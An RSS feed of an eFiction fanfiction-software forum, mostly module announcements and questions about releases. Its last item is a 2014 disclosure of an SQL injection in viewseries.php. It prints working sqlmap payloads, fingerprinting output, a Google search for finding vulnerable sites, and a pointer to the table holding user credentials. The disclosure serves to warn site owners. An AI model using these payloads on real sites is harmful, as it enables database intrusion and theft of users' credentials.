<?xml version="1.0" encoding="UTF-8"?>        <rss version="2.0"
             xmlns:atom="http://www.w3.org/2005/Atom"
             xmlns:dc="http://purl.org/dc/elements/1.1/"
             xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
             xmlns:admin="http://webns.net/mvcb/"
             xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
             xmlns:content="http://purl.org/rss/1.0/modules/content/">
        <channel>
            <title>
									eFiction Software News - eFiction Community Forums				            </title>
            <link>https://efiction.org/community/efiction-software-news/</link>
            <description>Discussion Board</description>
            <language>en-US</language>
            <lastBuildDate>Mon, 11 May 2026 00:19:17 +0000</lastBuildDate>
            <generator>wpForo</generator>
            <ttl>60</ttl>
							                    <item>
                        <title>module storyend updated and added option panel</title>
                        <link>https://efiction.org/community/efiction-software-news/module-storyend-updated-and-added-option-panel/</link>
                        <pubDate>Thu, 09 May 2024 20:45:05 +0000</pubDate>
                        <description><![CDATA[I updated storyend module and added an option panel.   
The reason for this:
the user, who shared this module code with me, had commented series part and I wanted to avoid manual changes i...]]></description>
                        <content:encoded><![CDATA[<p>I updated storyend module and added an option panel.   </p>
<p>The reason for this:</p>
<p>the user, who shared this module code with me, had commented series part and I wanted to avoid manual changes in the code for her.</p>
<p>Version 3.5.8 is needed because this version fixed coauthors. </p>
<p>Prepared for testing</p>
<p> </p>
<p><a href="https://github.com/e107-eFiction/modules" target="_blank" rel="noopener">https://github.com/e107-eFiction/modules</a></p>
<p> </p>
<div id="wpfa-48686" class="wpforo-attached-file"><a class="wpforo-default-attachment" title="storyend_module_version1.4.jpg" href="//efiction.org/wp-content/uploads/wpforo/default_attachments/1715287505-storyend_module_version14.jpg" target="_blank" rel="noopener"><i class="fas fa-paperclip"></i> storyend_module_version1.4.jpg</a></div>]]></content:encoded>
						                            <category domain="https://efiction.org/community/efiction-software-news/">eFiction Software News</category>                        <dc:creator>Jimmi</dc:creator>
                        <guid isPermaLink="true">https://efiction.org/community/efiction-software-news/module-storyend-updated-and-added-option-panel/</guid>
                    </item>
				                    <item>
                        <title>new module - storybanner</title>
                        <link>https://efiction.org/community/efiction-software-news/new-module-storybanner/</link>
                        <pubDate>Sat, 06 Apr 2024 15:40:40 +0000</pubDate>
                        <description><![CDATA[This module adds a banner field for stories and series. Simple one-line text field for the full path to the image.

To use it in the skin:

series

Templates:
- listings.tpl
- series...]]></description>
                        <content:encoded><![CDATA[<div><span>This module adds a banner field for stories and series. Simple one-line text field for the full path to the image.</span></div>
<br />
<div><span>To use it in the skin:</span></div>
<br />
<div><span style="text-decoration: underline"><strong>series</strong></span></div>
<br />
<div><span>Templates:</span></div>
<div><em>- listings.tpl</em></div>
<div><em>- seriesblock.tpl</em></div>
<br />
<div>
<pre contenteditable="false">{seriesbanner} </pre>
<span> - insert the image with HTML img tag</span></div>
<br />
<div>
<pre contenteditable="false">{seriesbanner_src}</pre>
<span> </span><span>- return only image path</span></div>
<div> </div>
<div>
<pre contenteditable="false">{seriesbanner_title}</pre>
<span> - return the title of the series in format for the alt tag</span></div>
<br />
<div><span>Example:</span></div>
<div> </div>
<div>
<pre contenteditable="false">&lt;img src="{seriesbanner_src}" class="rounded mx-auto d-block" alt="{seriesbanner_title}"&gt;
or
{seriesbanner}</pre>
</div>
<br />
<div><span style="text-decoration: underline"><strong>stories</strong></span></div>
<br />
<div><span>Templates:</span></div>
<div><em>- listings.tpl</em></div>
<div><em>- storyindex.tpl</em></div>
<br />
<div>
<pre contenteditable="false">{storybanner}</pre>
<span> - insert an image with HTML img tag</span></div>
<br />
<div>
<pre contenteditable="false">{storybanner_src}</pre>
<span> - return only image path</span></div>
<div> </div>
<div>
<pre contenteditable="false">{storybanner_title}</pre>
<span> - return the title of story in format for the alt tag</span></div>
<br />
<div><span>Example:</span></div>
<div>
<pre contenteditable="false">&lt;img src="{storybanner_src}" class="rounded mx-auto d-block" alt="{storybanner_title}"&gt;
or
{storybanner}</pre>
</div>
<p> </p>
<p>Repo:</p>
<p><a href="https://github.com/e107-eFiction/modules" target="_blank" rel="noopener">https://github.com/e107-eFiction/modules</a></p>
<p> </p>
<p> </p>
<p> </p>]]></content:encoded>
						                            <category domain="https://efiction.org/community/efiction-software-news/">eFiction Software News</category>                        <dc:creator>Jimmi</dc:creator>
                        <guid isPermaLink="true">https://efiction.org/community/efiction-software-news/new-module-storybanner/</guid>
                    </item>
				                    <item>
                        <title>block Featured Authors updated</title>
                        <link>https://efiction.org/community/efiction-software-news/block-featured-authors-updated/</link>
                        <pubDate>Thu, 07 Mar 2024 13:22:26 +0000</pubDate>
                        <description><![CDATA[Outdated block Featured Authors for 3.5.2 updated for version 3.5.6 (and 3.5.5 then)
 
 
I don&#039;t know if more blocks are missing from the official 3.5.5, but if not, should this be added ...]]></description>
                        <content:encoded><![CDATA[<p>Outdated block Featured Authors for 3.5.2 updated for version 3.5.6 (and 3.5.5 then)</p>
<p> </p>
<p><a href="https://github.com/e107-eFiction/blocks" target="_blank" rel="noopener">https://github.com/e107-eFiction/blocks</a></p>
<p> </p>
<p>I don't know if more blocks are missing from the official 3.5.5, but if not, should this be added to 3.5.6 release? Or separate repo is fine?</p>
<p>Thank you @kaleidopy for saving the original code.</p>
<p> </p>
<p>PS. In fact, I am posting this to see if there is a difference in forum post visibility. </p>
<p> </p>
<div id="wpfa-48675" class="wpforo-attached-file"><a class="wpforo-default-attachment" href="//efiction.org/wp-content/uploads/wpforo/default_attachments/1709817746-FeaturedAuthor.jpg" target="_blank" title="FeaturedAuthor.jpg"><i class="fas fa-paperclip"></i>&nbsp;FeaturedAuthor.jpg</a></div>]]></content:encoded>
						                            <category domain="https://efiction.org/community/efiction-software-news/">eFiction Software News</category>                        <dc:creator>Jimmi</dc:creator>
                        <guid isPermaLink="true">https://efiction.org/community/efiction-software-news/block-featured-authors-updated/</guid>
                    </item>
				                    <item>
                        <title>What is the latest current version?</title>
                        <link>https://efiction.org/community/efiction-software-news/what-is-the-latest-current-version/</link>
                        <pubDate>Sun, 07 Jan 2024 21:08:32 +0000</pubDate>
                        <description><![CDATA[Hi!  I am a little confused.  I read one announcement from Nov 23 saying that 3.5.7 was going to be the next release (with support for PHP 8.1), but no actual release announcement.  I also f...]]></description>
                        <content:encoded><![CDATA[<p>Hi!  I am a little confused.  I read one announcement from Nov 23 saying that 3.5.7 was going to be the next release (with support for PHP 8.1), but no actual release announcement.  I also found a post that seemed to indicate that 3.6 is out and running.  In either case, what is the latest version available?  My hosting company is now charging legacy support fees for old versions of PHP.  I'd like to upgrade my current 3.5.5 if possible.</p>
<p>Thanks!</p>]]></content:encoded>
						                            <category domain="https://efiction.org/community/efiction-software-news/">eFiction Software News</category>                        <dc:creator>Katarr</dc:creator>
                        <guid isPermaLink="true">https://efiction.org/community/efiction-software-news/what-is-the-latest-current-version/</guid>
                    </item>
				                    <item>
                        <title>What&#039;s up?</title>
                        <link>https://efiction.org/community/efiction-software-news/whats-up/</link>
                        <pubDate>Thu, 10 Aug 2023 13:16:07 +0000</pubDate>
                        <description><![CDATA[I&#039;m sad to see that there is hardly anything going on here and that more and more eFiction archives seem to be dissolved or swallowed by AO3.It seems that not only my husband and I had other...]]></description>
                        <content:encoded><![CDATA[<p>I'm sad to see that there is hardly anything going on here and that more and more eFiction archives seem to be dissolved or swallowed by AO3.<br /><br />It seems that not only my husband and I had other priorities than to take care of the new script.<br /><br />I had hoped that ... I don't know, someone else would get on with a modern eFiction faster and better.<br /><br />Fortunately, I have my husband's script, which has been in beta for a year. Three archives are already running on it. Not bug-free, of course, but they run. ;)<br /><br />Sid, I wish you all the best for the future and hope that you will turn things around and help eFiction to shine again.<br />It's just such a terrible shame to see so many wonderful archives go or merge with the behemoth that is AO3. Where is the individuality of the fandoms? *sigh<br /><br />Take care<br />Nadia</p>]]></content:encoded>
						                            <category domain="https://efiction.org/community/efiction-software-news/">eFiction Software News</category>                        <dc:creator>Nadia</dc:creator>
                        <guid isPermaLink="true">https://efiction.org/community/efiction-software-news/whats-up/</guid>
                    </item>
				                    <item>
                        <title>Any News on an Update</title>
                        <link>https://efiction.org/community/efiction-software-news/any-news-on-an-update/</link>
                        <pubDate>Sun, 09 Jul 2023 03:07:22 +0000</pubDate>
                        <description><![CDATA[I have two large fanfiction archives. I understand there were plans to modernize the code, but that post was made last year. Is there an update announcement? I don&#039;t want to abandon efiction...]]></description>
                        <content:encoded><![CDATA[<p>I have two large fanfiction archives. I understand there were plans to modernize the code, but that post was made last year. Is there an update announcement? I don't want to abandon efiction. I have been using it from almost the beginning, but time has left 3.5 way behind.</p>]]></content:encoded>
						                            <category domain="https://efiction.org/community/efiction-software-news/">eFiction Software News</category>                        <dc:creator>kaleidopy</dc:creator>
                        <guid isPermaLink="true">https://efiction.org/community/efiction-software-news/any-news-on-an-update/</guid>
                    </item>
				                    <item>
                        <title>A few things I need to help you</title>
                        <link>https://efiction.org/community/efiction-software-news/a-few-things-i-need-to-help-you/</link>
                        <pubDate>Mon, 12 Dec 2022 21:07:18 +0000</pubDate>
                        <description><![CDATA[Hi! I have been reading everyone (including my former webmaster who was a member) since 2007. I have three eFiction sites and they all need work.
So, I found Rebecca, again. (It was my site...]]></description>
                        <content:encoded><![CDATA[<p>Hi! I have been reading everyone (including my former webmaster who was a member) since 2007. I have three eFiction sites and they all need work.</p>
<p>So, I found Rebecca, again. (It was my site that she was guinea pigging for the WP conversion years ago.)</p>
<p>I'm going to pay Rebecca to update/upgrade my sites because eFiction is simply the best library system out there and I have freaking looked. I don't want to use something else. </p>
<p>However, in my years of doing this, I have designed my own workarounds for issues. I know you all have, too. The point, though, is to actually fix all the things that are "difficult, clunky, rigid," and don't freaking work - but I don't remember what they were because I found a workaround or just made the thing go away. </p>
<p><strong>PLEASE, please give me a list of the stuff that doesn't work/security risks right out of the box, from earlier versions to what you have now. I will give her the list. I did look through here to start my list but i want to compare now, please.</strong></p>
<p>I have gone through this forum in the hopes of gleaning a wish list as well. </p>
<p>Help, please?</p>
<p>Christy<br />P.S. I have also, gleefully, taken on sites just to archive the work so if you can't take it anymore....</p>]]></content:encoded>
						                            <category domain="https://efiction.org/community/efiction-software-news/">eFiction Software News</category>                        <dc:creator>Christy</dc:creator>
                        <guid isPermaLink="true">https://efiction.org/community/efiction-software-news/a-few-things-i-need-to-help-you/</guid>
                    </item>
				                    <item>
                        <title>Any developments?</title>
                        <link>https://efiction.org/community/efiction-software-news/any-developments/</link>
                        <pubDate>Fri, 13 Aug 2021 18:05:26 +0000</pubDate>
                        <description><![CDATA[I&#039;d like to know if there&#039;s any active development (or at least heartfelt plans) on eFiction. There doesn&#039;t appear to be any activity here on the forum and it looks like it&#039;s gotten some spa...]]></description>
                        <content:encoded><![CDATA[<p>I'd like to know if there's any active development (or at least heartfelt plans) on eFiction. There doesn't appear to be any activity here on the forum and it looks like it's gotten some spam posts, but it's also been a crazy year for the world. I'm just trying to make some decisions about the future of an archive and whether to port it to AO3 or hang in there. </p>
<p> </p>]]></content:encoded>
						                            <category domain="https://efiction.org/community/efiction-software-news/">eFiction Software News</category>                        <dc:creator>entallat</dc:creator>
                        <guid isPermaLink="true">https://efiction.org/community/efiction-software-news/any-developments/</guid>
                    </item>
				                    <item>
                        <title>Latest available version</title>
                        <link>https://efiction.org/community/efiction-software-news/latest-available-version/</link>
                        <pubDate>Tue, 30 Dec 2014 08:14:49 +0000</pubDate>
                        <description><![CDATA[Hi everyoneOn the download page, the onl version I could find is the 3.5.3.As I run in troubles installing this version on my new server, I happen to read some table installation problem is ...]]></description>
                        <content:encoded><![CDATA[Hi everyone<br><br>On the download page, the onl version I could find is the 3.5.3.<br>As I run in troubles installing this version on my new server, I happen to read some table installation problem is solved in version 3.5.4.<br>But then where is this version ?<br>The fix I found does not solve anything<br><br>Thanks <br>Brigitte]]></content:encoded>
						                            <category domain="https://efiction.org/community/efiction-software-news/">eFiction Software News</category>                        <dc:creator>bsky92</dc:creator>
                        <guid isPermaLink="true">https://efiction.org/community/efiction-software-news/latest-available-version/</guid>
                    </item>
				                    <item>
                        <title>SQL Injection vulnerability in eFiction</title>
                        <link>https://efiction.org/community/efiction-software-news/sql-injection-vulnerability-in-efiction/</link>
                        <pubDate>Thu, 13 Nov 2014 00:46:24 +0000</pubDate>
                        <description><![CDATA[Hello ...The viewseries.php page in eFiction 3.5.3 is vulnerable to an SQL Injection attack.The page loads the URL parameter &quot;seriesid&quot;:&nbsp; &nbsp;  $seriesid = isset($_GET&#091;...]]></description>
                        <content:encoded><![CDATA[Hello ...<br><br>The viewseries.php page in eFiction 3.5.3 is vulnerable to an SQL Injection attack.<br>The page loads the URL parameter &quot;seriesid&quot;:<br><br>&nbsp; &nbsp;  $seriesid = isset($_GET&#091;&#039;seriesid&#039;]) ? $_GET&#091;&#039;seriesid&#039;] : false;<br><br>Then it passes the *tainted* value directly down to the database:<br><br>&nbsp; &nbsp;  $parents = dbquery(&quot;SELECT s.title, s.seriesid FROM &quot;.TABLEPREFIX.&quot;fanfiction_inseries as i, <br>&nbsp; &nbsp;  &quot;.TABLEPREFIX.&quot;fanfiction_series as s WHERE s.seriesid = i.seriesid AND i.subseriesid = &#039;$seriesid&#039;&quot;);<br><br>This allows an attacker to extract information from the underlying database.<br><br>&nbsp; &nbsp;  sqlmap identified the following injection points with a total of 396 HTTP(s) requests:<br>&nbsp; &nbsp;  ---<br>&nbsp; &nbsp;  Place: GET<br>&nbsp; &nbsp;  Parameter: seriesid<br>&nbsp; &nbsp; &nbsp; &nbsp;  Type: boolean-based blind<br>&nbsp; &nbsp; &nbsp; &nbsp;  Title: AND boolean-based blind - WHERE or HAVING clause<br>&nbsp; &nbsp; &nbsp; &nbsp;  Payload: seriesid=1&#039; AND 9530=9530 AND &#039;xaMV&#039;=&#039;xaMV<br><br>&nbsp; &nbsp; &nbsp; &nbsp;  Type: error-based<br>&nbsp; &nbsp; &nbsp; &nbsp;  Title: MySQL &gt;= 4.1 OR error-based - WHERE or HAVING clause<br>&nbsp; &nbsp; &nbsp; &nbsp;  Payload: seriesid=-1947&#039; OR ROW(2257,7329)&gt;(SELECT COUNT(*),CONCAT(0x716e656e71,(SELECT (CASE WHEN (2257=2257) THEN 1 ELSE 0 END)),0x716c746b71,FLOOR(RAND(0)*2))x FROM (SELECT 7852 UNION SELECT 4197 UNION SELECT 3571 UNION SELECT 7903)a GROUP BY x) AND &#039;zplx&#039;=&#039;zplx<br><br>&nbsp; &nbsp; &nbsp; &nbsp;  Type: AND/OR time-based blind<br>&nbsp; &nbsp; &nbsp; &nbsp;  Title: MySQL &gt; 5.0.11 AND time-based blind<br>&nbsp; &nbsp; &nbsp; &nbsp;  Payload: seriesid=1&#039; AND SLEEP(5) AND &#039;hXxL&#039;=&#039;hXxL<br>&nbsp; &nbsp;  ---<br>&nbsp; &nbsp;    testing MySQL<br>&nbsp; &nbsp;    confirming MySQL<br>&nbsp; &nbsp;    the back-end DBMS is MySQL<br>&nbsp; &nbsp;    fetching banner<br>&nbsp; &nbsp;    retrieving the length of query output<br>&nbsp; &nbsp;    retrieved: 20<br>&nbsp; &nbsp;    retrieved: 5.1.69-community-log<br>&nbsp; &nbsp;    actively fingerprinting MySQL<br>&nbsp; &nbsp;    executing MySQL comment injection fingerprint<br>&nbsp; &nbsp;  web application technology: Apache, PHP 5.2.17<br>&nbsp; &nbsp;  back-end DBMS: active fingerprint: MySQL &gt;= 5.1.12 and &lt; 5.5.0<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  banner parsing fingerprint: MySQL 5.1.69, logging enabled<br>&nbsp; &nbsp;  banner:&nbsp; &nbsp; &#039;5.1.69-community-log&#039;<br><br>Vulnerable sites can be found using Google by executing this search:<br><br>&nbsp; &nbsp;  inurl:&quot;viewseries.php?seriesid=&quot;<br><br>The complete list of usernames/passwords can be obtained by dumping the fanfiction_authors table.<br><br>Anybody running eFiction 3.5.3 should be advised that their user credentials are available to the public.<br><br> ... Robert<br>]]></content:encoded>
						                            <category domain="https://efiction.org/community/efiction-software-news/">eFiction Software News</category>                        <dc:creator>guest14424</dc:creator>
                        <guid isPermaLink="true">https://efiction.org/community/efiction-software-news/sql-injection-vulnerability-in-efiction/</guid>
                    </item>
							        </channel>
        </rss>
		